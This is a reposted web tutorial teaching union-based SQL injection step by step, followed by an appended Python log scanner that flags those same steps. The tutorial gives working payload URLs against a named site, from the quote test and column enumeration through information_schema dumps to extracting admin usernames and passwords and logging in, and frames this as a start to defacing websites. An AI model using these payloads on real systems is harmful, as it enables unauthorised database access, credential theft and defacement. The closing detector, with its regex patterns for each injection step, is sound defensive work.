Source: 自学PHP网 (www.zixuephp.com)  Date: 2015-04-17 14:47
SQLi (SQL injection, or structured query language injection) is apparently the first step when getting into exploiting or hacking websites and defacing them. It is easily done and it is a great starting-off point. SQLi is basically injecting queries into a database, or using queries to get an authorization bypass as an admin.
How is it done:
First, you need to find an SQLi vulnerable site, for example: http://www.2cto.com /index.php?id=3
To check that it is vulnerable, all you have to do is put a ' at the end of the URL. So now your URL should look like this: http://www.2cto.com /index.php?id=3'
Press enter and you get some kind of error. The errors will vary, but it should look something like this (screenshot: http://i982.photobucket.com/albums/ae308/blink1337/1.png), or it would display like this: mysql error syntax.....
If an error happens, that site is vulnerable! Now we can start on the proper injection... hehehhe. LOL
Getting Number of Columns
After finding your vulnerable site, the first step you need to take is to find the number of columns. The easiest way to do this is to use the statement "order by". All you have to do is put ORDER BY (number) at the end of your URL. So it should look like this:
http://www.2cto.com /index.php?id=3 order by 1
You should start with order by 1 and keep increasing the number by 1 until you get an error.
It should look like this:
http://www.2cto.com /index.php?id=3 order by 1
http://www.2cto.com /index.php?id=3 order by 2
http://www.2cto.com /index.php?id=3 order by 3
http://www.2cto.com /index.php?id=3 order by 4
http://www.2cto.com /index.php?id=3 order by 5
http://www.2cto.com /index.php?id=3 order by 6
If you get an error at the 7th order, then there are only 6 columns for you to insert for the command union select all.
Finding Accessible Columns
Now that we have the number of columns, we need to get the column numbers that we can grab information from. We do this by using "union", "select" and the number of columns. You put them together in your URL like this (put "-" after the string "="):
http://www.2cto.com /index.php?id=-3 union select 1,2,3,4,5,6
After you do that you should get something like this (screenshot: http://i982.photobucket.com/albums/ae308/blink1337/3.png). The page should look a bit messed up and there should be 2 numbers or more on the page (that actually depends on the site). These numbers are the column numbers we can get information from. We will replace them with statements later on, so write them down or remember them.
Finding MySQL Database Version
Put @@version in place of the desired number; for example, you choose no. 1:
http://www.2cto.com /index.php?id=-3 union select @@version,2,3,4,5,6
Press enter and now the page should display the database version (screenshot: http://i982.photobucket.com/albums/ae308/blink1337/4.png). The number that we had in the first step is now replaced with the database version, as it shows above. The site that I am testing has a version number of 5.0.45. Since this number is 5 or above we will continue working on this site (the information_schema database that the next steps query only exists from MySQL 5.0 on).
Finding the Tables
Next we are going to inject the website to find the table names. We do this by replacing @@version with "group_concat(table_name)" and also adding "+from+information_schema.tables+where+table_schema=database()--" after the last number in our URL.
http://www.2cto.com /index.php?id=-3 union select all group_concat(table_name),2,3,4,5,6+from+information_schema.tables+where+table_schema=database()--
The page should now show the table names. You may want to write them down. (Screenshot: http://i982.photobucket.com/albums/ae308/blink1337/untitled-1.png)
Finding Column Names
This is exactly like getting table names; you just change table_name to column_name and information_schema.tables to information_schema.columns. So your URL should look like this:
http://www.2cto.com /index.php?id=-3 union select all group_concat(column_name),2,3,4,5,6+from+information_schema.columns+where+table_schema=database()--
Now the page should display the column names, for example: password, username, email, name, id, date created, last login, etc. (once again, it depends on the site).
Getting Information
Now that we have the database name, table names, and column names, we can put them together and pull information from them. To do this we need to put the following in our URL.
The column names should be inserted in the group_concat() section and the table name should be inserted after the from; therefore you should omit the +from+information_schema.columns+where+table_schema=database()-- part, just like this:
This is the last part of the code:
http://www.2cto.com /index.php?id=-3 union select group_concat(username,0x3a,password),2,3,4,5,6+from+admin
(Note: 0x3a is used as a separator; it is the hex ASCII code for ":".) Then poof, you just got the login name and the password... All you need to do is find the admin cPanel and log in with the required information.
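From the defender's side, every step of the walkthrough above (the trailing quote, the ORDER BY enumeration, UNION SELECT, information_schema, group_concat, @@version) lands in the web server's access log as a query-string value. The following is an added example, not code from the original tutorial: it parses constructed Apache combined-format log lines (the IPs, timestamps and payloads are made up for this example), decodes the query parameters the way the application would see them, and correlates the distinct indicators per source IP so that one stray quote is noise but the full sequence stands out.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qsl

# Constructed sample access log (Apache combined format); not from any real server.
SAMPLE_LOG = r"""
203.0.113.5 - - [17/Apr/2015:14:47:01 +0800] "GET /index.php?id=3 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.5 - - [17/Apr/2015:14:47:05 +0800] "GET /index.php?id=3' HTTP/1.1" 500 312 "-" "Mozilla/5.0"
203.0.113.5 - - [17/Apr/2015:14:47:09 +0800] "GET /index.php?id=3%20order%20by%207 HTTP/1.1" 500 298 "-" "Mozilla/5.0"
203.0.113.5 - - [17/Apr/2015:14:47:20 +0800] "GET /index.php?id=-3+union+select+group_concat(table_name),2,3,4,5,6+from+information_schema.tables+where+table_schema=database()-- HTTP/1.1" 200 7034 "-" "Mozilla/5.0"
198.51.100.9 - - [17/Apr/2015:14:48:00 +0800] "GET /index.php?id=42&sort=date HTTP/1.1" 200 5100 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')

# One indicator per step of the union-based walkthrough, matched against the decoded parameter value.
INDICATORS = [
    ("trailing_quote", re.compile(r"^\s*-?\d+\s*'\s*$")),
    ("order_by_enum", re.compile(r"\border\s+by\s+\d+", re.I)),
    ("union_select", re.compile(r"\bunion\s+(all\s+)?select\b", re.I)),
    ("information_schema", re.compile(r"\binformation_schema\.(tables|columns)\b", re.I)),
    ("group_concat", re.compile(r"\bgroup_concat\s*\(", re.I)),
    ("version_probe", re.compile(r"@@version", re.I)),
]

def scan_request(target):
    """Return (parameter, indicator) pairs for every decoded query value that matches."""
    # parse_qsl percent-decodes and turns '+' into spaces, which is how the payloads reach the app.
    params = parse_qsl(urlsplit(target).query, keep_blank_values=True)
    return [(name, label) for name, value in params for label, pat in INDICATORS if pat.search(value)]

def scan_log(log_text):
    """Return (ip, status, hits) for each request line carrying at least one indicator."""
    flagged = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line.strip())
        if not m:
            continue  # blank line or a line that is not in combined format
        hits = scan_request(m["target"])
        if hits:
            flagged.append((m["ip"], int(m["status"]), hits))
    return flagged

def suspicious_clients(log_text, min_indicators=2):
    """Correlate per source IP: several distinct steps from one client is the walkthrough, one is noise."""
    seen = defaultdict(set)
    for ip, _status, hits in scan_log(log_text):
        seen[ip].update(label for _param, label in hits)
    return {ip: sorted(labels) for ip, labels in seen.items() if len(labels) >= min_indicators}
```

The 500 responses on the probing lines are the server-side trace of the "some kind of error" the tutorial relies on, so pairing the status code with the indicators is a useful second signal.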